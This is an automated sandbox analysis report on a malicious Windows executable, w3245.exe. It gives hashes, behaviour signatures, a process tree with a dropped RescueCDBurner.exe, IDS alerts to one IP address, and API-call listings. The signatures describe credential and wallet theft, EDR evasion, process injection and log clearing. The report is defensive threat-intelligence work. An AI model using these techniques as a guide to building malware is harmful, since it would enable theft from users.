Windows Analysis Report
w3245.exe

Overview

General Information

Sample name:w3245.exe
Analysis ID:1584991
MD5:e92b4d3ee13da899ea0ad5b54a0094ed
SHA1:6068b49ac36eb618d20f5b3b4efad1d9bac68f5b
SHA256:97abaf743b7b33aa0f0c6ab83527cc253c9e231c4e68da5d9a42fc45ef655877
Tags:exeuser-NatrXN1O1
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • w3245.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\w3245.exe" MD5: E92B4D3EE13DA899EA0AD5B54A0094ED)
    • w3245.exe (PID: 7360 cmdline: "C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=688 -burn.filehandle.self=692 MD5: EC4072E1AE2A9316270E6AFD66235A97)
      • RescueCDBurner.exe (PID: 7424 cmdline: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)
        • RescueCDBurner.exe (PID: 7440 cmdline: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)
          • cmd.exe (PID: 7460 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • LocalCtrl_alpha_v3.exe (PID: 8032 cmdline: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
              • msedge.exe (PID: 6048 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 7436 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1980,i,14784043117474670596,10515819180786233861,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • RescueCDBurner.exe (PID: 7956 cmdline: "C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)
    • cmd.exe (PID: 7976 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • LocalCtrl_alpha_v3.exe (PID: 8148 cmdline: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • msedge.exe (PID: 5888 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5664 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3716 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6740 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 4556 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6752 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • identity_helper.exe (PID: 7024 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • identity_helper.exe (PID: 7060 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • msedge.exe (PID: 5544 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5752 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 7800 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6496 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1516 --field-trial-handle=2100,i,1290917253854219451,795298086300262693,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 3176 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2800 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=952 --field-trial-handle=1852,i,10935174027407288712,12025004199992672972,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp                        SID      Severity  Classtype        Source IP    Source Port  Destination IP  Destination Port  Protocol
2025-01-06T23:17:48.719723+0100  2028371  3         Unknown Traffic  192.168.2.4  49850        104.21.80.52    443               TCP
2025-01-06T23:17:50.082367+0100  2028371  3         Unknown Traffic  192.168.2.4  49861        104.21.80.52    443               TCP
2025-01-06T23:17:51.375110+0100  2028371  3         Unknown Traffic  192.168.2.4  49872        104.21.80.52    443               TCP
2025-01-06T23:18:10.796365+0100  2028371  3         Unknown Traffic  192.168.2.4  50061        104.21.80.52    443               TCP
2025-01-06T23:18:12.862362+0100  2028371  3         Unknown Traffic  192.168.2.4  50073        104.21.80.52    443               TCP
2025-01-06T23:18:21.925120+0100  2028371  3         Unknown Traffic  192.168.2.4  50111        104.21.80.52    443               TCP
2025-01-06T23:18:23.353479+0100  2028371  3         Unknown Traffic  192.168.2.4  50112        104.21.80.52    443               TCP
2025-01-06T23:18:24.479914+0100  2028371  3         Unknown Traffic  192.168.2.4  50113        104.21.80.52    443               TCP
2025-01-06T23:18:25.469662+0100  2028371  3         Unknown Traffic  192.168.2.4  50114        104.21.80.52    443               TCP
2025-01-06T23:18:27.736640+0100  2028371  3         Unknown Traffic  192.168.2.4  50115        104.21.80.52    443               TCP
2025-01-06T23:18:29.468954+0100  2028371  3         Unknown Traffic  192.168.2.4  50116        104.21.80.52    443               TCP
2025-01-06T23:18:30.654869+0100  2028371  3         Unknown Traffic  192.168.2.4  50117        104.21.80.52    443               TCP
2025-01-06T23:18:42.932749+0100  2028371  3         Unknown Traffic  192.168.2.4  50118        104.21.80.52    443               TCP
2025-01-06T23:18:44.191071+0100  2028371  3         Unknown Traffic  192.168.2.4  50119        104.21.80.52    443               TCP
2025-01-06T23:18:45.270575+0100  2028371  3         Unknown Traffic  192.168.2.4  50120        104.21.80.52    443               TCP
2025-01-06T23:18:46.127606+0100  2028371  3         Unknown Traffic  192.168.2.4  50121        104.21.80.52    443               TCP
2025-01-06T23:18:48.265713+0100  2028371  3         Unknown Traffic  192.168.2.4  50122        104.21.80.52    443               TCP
2025-01-06T23:18:50.519130+0100  2028371  3         Unknown Traffic  192.168.2.4  50123        104.21.80.52    443               TCP
2025-01-06T23:18:51.816735+0100  2028371  3         Unknown Traffic  192.168.2.4  50124        104.21.80.52    443               TCP

AV Detection

Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0091A0BB DecryptFileW,0_2_0091A0BB
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0093FA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,0_2_0093FA62
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00919E9E DecryptFileW,DecryptFileW,0_2_00919E9E
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00C9A0BB DecryptFileW,1_2_00C9A0BB
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CBFA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,1_2_00CBFA62
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00C99E9E DecryptFileW,DecryptFileW,1_2_00C99E9E
Source: RescueCDBurner.exe, 00000002.00000002.1749055364.000000006C229000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_44c6c15a-f
Source: w3245.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe File opened: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\msvcr100.dll
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50061 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50073 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50111 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50112 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50113 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50114 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50115 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50116 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50118 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50119 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50120 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50121 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50122 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50123 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50124 version: TLS 1.2
Source: w3245.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: w3245.exe, 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000000.00000000.1694764523.000000000094B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000001.00000000.1701554751.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp, w3245.exe, 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000003.00000002.1807193825.000000006B491000.00000020.00000001.01000000.00000015.sdmp, RescueCDBurner.exe, 0000000A.00000002.2073421125.000000006BDB1000.00000020.00000001.01000000.00000015.sdmp
Source: Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000003.00000002.1807089950.000000006B3D1000.00000020.00000001.01000000.00000016.sdmp, RescueCDBurner.exe, 0000000A.00000002.2073697527.000000006BFB1000.00000020.00000001.01000000.00000016.sdmp
Source: Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000002.00000002.1748082870.000000000A080000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1747896540.0000000009D22000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805704607.000000000A11A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805953912.000000000A82C000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805820438.000000000A470000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091445056.0000000004D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2092120165.0000000005670000.00000004.00001000.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068385981.000000000A215000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000002.00000002.1748082870.000000000A080000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1747896540.0000000009D22000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805704607.000000000A11A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805953912.000000000A82C000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805820438.000000000A470000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091445056.0000000004D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2092120165.0000000005670000.00000004.00001000.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068385981.000000000A215000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000002.00000002.1749820013.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000003.00000002.1807780117.000000006B8F1000.00000020.00000001.01000000.00000011.sdmp, RescueCDBurner.exe, 0000000A.00000002.2074506885.000000006F841000.00000020.00000001.01000000.00000011.sdmp
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00903CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_00903CC4
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00944440 FindFirstFileW,FindClose,0_2_00944440
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00919B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_00919B43
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CC4440 FindFirstFileW,FindClose,1_2_00CC4440
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00C99B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,1_2_00C99B43
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00C83CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,1_2_00C83CC4
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3D32E _FindFirstFileEx_@24,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3D32E
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3D43A _FindFirstFile_@8,SetLastError,memset,newMultiByteFromWideChar,FindFirstFileA,MultiByteToWideChar,MultiByteToWideChar,GlobalFree,1_2_5BB3D43A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42C8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,3_2_6B42C8FD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B43088A _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B43088A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42CC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,3_2_6B42CC23
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B430CBB _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B430CBB
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3F81A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B3F81A1
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42E0BD _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,3_2_6B42E0BD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42DBC0 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,3_2_6B42DBC0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42F9DD _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B42F9DD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42FF0E _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B42FF0E
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42F169 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B42F169
